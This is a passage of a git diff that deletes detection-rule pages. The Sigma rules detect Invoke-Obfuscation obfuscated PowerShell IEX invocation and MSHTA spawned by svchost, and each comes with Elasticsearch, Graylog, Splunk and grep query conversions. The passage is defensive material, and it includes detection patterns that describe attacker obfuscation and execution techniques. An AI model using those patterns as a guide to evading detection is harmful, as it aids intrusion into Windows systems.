-    selection:
-        - CommandLine|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
-        - CommandLine|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
-        - CommandLine|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
-        - CommandLine|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
-        - CommandLine|re: '\*mdr\*\W\s*\)\.Name'
-        - CommandLine|re: '\$VerbosePreference\.ToString\('
-        - CommandLine|re: '\String\]\s*\$VerbosePreference'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml): Backend does not support map values of type <class 'sigma.parser.modifiers.type.SigmaRegularExpressionModifier'>
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR winlog.event_data.CommandLine:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR winlog.event_data.CommandLine:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR winlog.event_data.CommandLine:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR winlog.event_data.CommandLine:/\*mdr\*\W\s*\)\.Name/ OR winlog.event_data.CommandLine:/\$VerbosePreference\.ToString\(/ OR winlog.event_data.CommandLine:/\String\]\s*\$VerbosePreference/)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4bf943c6-5146-4273-98dd-e958fd1e3abf <<EOF
-{
-  "metadata": {
-    "title": "Invoke-Obfuscation Obfuscated IEX Invocation",
-    "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1027"
-    ],
-    "query": "(winlog.event_data.CommandLine:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.CommandLine:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.CommandLine:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.CommandLine:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.CommandLine:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.CommandLine:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.CommandLine:/\\String\\]\\s*\\$VerbosePreference/)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.CommandLine:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.CommandLine:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.CommandLine:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.CommandLine:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.CommandLine:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.CommandLine:/\\String\\]\\s*\\$VerbosePreference/)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Invoke-Obfuscation Obfuscated IEX Invocation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR CommandLine:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR CommandLine:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR CommandLine:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR CommandLine:/\*mdr\*\W\s*\)\.Name/ OR CommandLine:/\$VerbosePreference\.ToString\(/ OR CommandLine:/\String\]\s*\$VerbosePreference/)
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_invoke_obfuscation_obfuscated_iex_commandline.yml): Node type not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_services.md b/Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_services.md
deleted file mode 100644
index 56578c3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_invoke_obfuscation_obfuscated_iex_services.md
+++ /dev/null
@@ -1,353 +0,0 @@
-| Title                    | Invoke-Obfuscation Obfuscated IEX Invocation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block — https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniel Bohannon (@Mandiant/@FireEye), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Invoke-Obfuscation Obfuscated IEX Invocation
-id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9
-description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888"
-status: experimental
-author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-date: 2019/11/08
-tags:
-    - attack.defense_evasion
-    - attack.t1027
-falsepositives:
-    - Unknown
-level: high
-detection:
-    selection_1:
-        - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
-        - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
-        - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
-        - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
-        - ImagePath|re: '\*mdr\*\W\s*\)\.Name'
-        - ImagePath|re: '\$VerbosePreference\.ToString\('
-        - ImagePath|re: '\String\]\s*\$VerbosePreference'
-    condition: selection and selection_1
----
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 6
----
- logsource:
-     product: windows
-     service: security
- detection:
-     selection:
-         EventID: 4697
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml): Backend does not support map values of type <class 'sigma.parser.modifiers.type.SigmaRegularExpressionModifier'>
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND (winlog.event_data.ImagePath:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR winlog.event_data.ImagePath:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR winlog.event_data.ImagePath:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR winlog.event_data.ImagePath:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR winlog.event_data.ImagePath:/\*mdr\*\W\s*\)\.Name/ OR winlog.event_data.ImagePath:/\$VerbosePreference\.ToString\(/ OR winlog.event_data.ImagePath:/\String\]\s*\$VerbosePreference/))
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"6" AND (winlog.event_data.ImagePath:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR winlog.event_data.ImagePath:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR winlog.event_data.ImagePath:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR winlog.event_data.ImagePath:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR winlog.event_data.ImagePath:/\*mdr\*\W\s*\)\.Name/ OR winlog.event_data.ImagePath:/\$VerbosePreference\.ToString\(/ OR winlog.event_data.ImagePath:/\String\]\s*\$VerbosePreference/))
-(winlog.channel:"Security" AND winlog.event_id:"4697" AND (winlog.event_data.ImagePath:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR winlog.event_data.ImagePath:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR winlog.event_data.ImagePath:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR winlog.event_data.ImagePath:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR winlog.event_data.ImagePath:/\*mdr\*\W\s*\)\.Name/ OR winlog.event_data.ImagePath:/\$VerbosePreference\.ToString\(/ OR winlog.event_data.ImagePath:/\String\]\s*\$VerbosePreference/))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/51aa9387-1c53-4153-91cc-d73c59ae1ca9 <<EOF
-{
-  "metadata": {
-    "title": "Invoke-Obfuscation Obfuscated IEX Invocation",
-    "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1027"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND (winlog.event_data.ImagePath:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.ImagePath:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.ImagePath:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.ImagePath:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.ImagePath:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.ImagePath:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.ImagePath:/\\String\\]\\s*\\$VerbosePreference/))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND (winlog.event_data.ImagePath:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.ImagePath:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.ImagePath:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.ImagePath:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.ImagePath:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.ImagePath:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.ImagePath:/\\String\\]\\s*\\$VerbosePreference/))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Invoke-Obfuscation Obfuscated IEX Invocation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/51aa9387-1c53-4153-91cc-d73c59ae1ca9-2 <<EOF
-{
-  "metadata": {
-    "title": "Invoke-Obfuscation Obfuscated IEX Invocation",
-    "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1027"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND (winlog.event_data.ImagePath:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.ImagePath:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.ImagePath:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.ImagePath:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.ImagePath:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.ImagePath:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.ImagePath:/\\String\\]\\s*\\$VerbosePreference/))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND (winlog.event_data.ImagePath:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.ImagePath:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.ImagePath:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.ImagePath:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.ImagePath:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.ImagePath:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.ImagePath:/\\String\\]\\s*\\$VerbosePreference/))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Invoke-Obfuscation Obfuscated IEX Invocation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/51aa9387-1c53-4153-91cc-d73c59ae1ca9-3 <<EOF
-{
-  "metadata": {
-    "title": "Invoke-Obfuscation Obfuscated IEX Invocation",
-    "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1027"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND (winlog.event_data.ImagePath:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.ImagePath:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.ImagePath:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.ImagePath:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.ImagePath:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.ImagePath:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.ImagePath:/\\String\\]\\s*\\$VerbosePreference/))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND (winlog.event_data.ImagePath:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR winlog.event_data.ImagePath:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR winlog.event_data.ImagePath:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR winlog.event_data.ImagePath:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR winlog.event_data.ImagePath:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR winlog.event_data.ImagePath:/\\$VerbosePreference\\.ToString\\(/ OR winlog.event_data.ImagePath:/\\String\\]\\s*\\$VerbosePreference/))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Invoke-Obfuscation Obfuscated IEX Invocation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND (ImagePath:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR ImagePath:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR ImagePath:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR ImagePath:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR ImagePath:/\*mdr\*\W\s*\)\.Name/ OR ImagePath:/\$VerbosePreference\.ToString\(/ OR ImagePath:/\String\]\s*\$VerbosePreference/))
-(EventID:"6" AND (ImagePath:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR ImagePath:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR ImagePath:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR ImagePath:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR ImagePath:/\*mdr\*\W\s*\)\.Name/ OR ImagePath:/\$VerbosePreference\.ToString\(/ OR ImagePath:/\String\]\s*\$VerbosePreference/))
-(EventID:"4697" AND (ImagePath:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR ImagePath:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR ImagePath:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR ImagePath:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR ImagePath:/\*mdr\*\W\s*\)\.Name/ OR ImagePath:/\$VerbosePreference\.ToString\(/ OR ImagePath:/\String\]\s*\$VerbosePreference/))
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml): Node type not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_lethalhta.md b/Atomic_Threat_Coverage/Detection_Rules/win_lethalhta.md
deleted file mode 100644
index c2edb38..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_lethalhta.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | MSHTA Spwaned by SVCHOST       |
-|:-------------------------|:------------------|
-| **Description**          | Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1170: Mshta](https://attack.mitre.org/techniques/T1170)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://codewhitesec.blogspot.com/2018/07/lethalhta.html](https://codewhitesec.blogspot.com/2018/07/lethalhta.html)</li></ul>  |
-| **Author**               | Markus Neis |
-| Other Tags           | <ul><li>attack.t1218.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MSHTA Spwaned by SVCHOST
-id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471
-status: experimental
-description: Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report
-references:
-    - https://codewhitesec.blogspot.com/2018/07/lethalhta.html
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1170
-    - attack.t1218.005
-author: Markus Neis
-date: 2018/06/07
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\svchost.exe'
-        Image: '*\mshta.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\svchost.exe" -and $_.message -match "Image.*.*\\mshta.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\svchost.exe AND winlog.event_data.Image.keyword:*\\mshta.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ed5d72a6-f8f4-479d-ba79-02f6a80d7471 <<EOF
-{
-  "metadata": {
-    "title": "MSHTA Spwaned by SVCHOST",
-    "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1170",
-      "attack.t1218.005"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\svchost.exe AND winlog.event_data.Image.keyword:*\\\\mshta.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\svchost.exe AND winlog.event_data.Image.keyword:*\\\\mshta.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MSHTA Spwaned by SVCHOST'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\svchost.exe AND Image.keyword:*\\mshta.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\svchost.exe" Image="*\\mshta.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\svchost.exe" Image="*\\mshta.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\svchost\.exe)(?=.*.*\mshta\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_lm_namedpipe.md b/Atomic_Threat_Coverage/Detection_Rules/win_lm_namedpipe.md
deleted file mode 100644
index 1b5f9e8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_lm_namedpipe.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | First Time Seen Remote Named Pipe       |
-|:-------------------------|:------------------|
